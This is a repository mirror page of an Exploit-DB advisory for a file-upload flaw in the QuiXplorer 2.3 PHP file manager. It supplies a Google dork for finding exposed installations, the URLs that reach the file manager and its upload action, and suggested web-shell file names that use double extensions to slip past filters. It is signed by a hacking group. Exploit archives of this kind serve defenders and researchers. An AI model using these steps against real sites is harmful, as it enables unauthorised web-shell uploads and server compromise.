bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18118.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

36 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
# Google Dork: "QuiXplorer 2.3 - the QuiX project"
# Date: 13/11/2011
# Author: PCA & krhr_krhr and
# Software Link: http://quixplorer.sourceforge.net/
# Version: QuiXplorer 2.3
# Tested on: linux ,windows
# CVE :
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerablity
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
after Going to this you will saw a file manager
you can upload your files here
find this icons in page and click on last, its upload option ::
You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
Quote:
example : http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PCA PERUVIAN CYBER ARMY & krhr_krhr and (HF)
PCA TEAM :
-rAtoN
-Chipd3bios
-jardha
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Reference in a new issue View git blame Copy permalink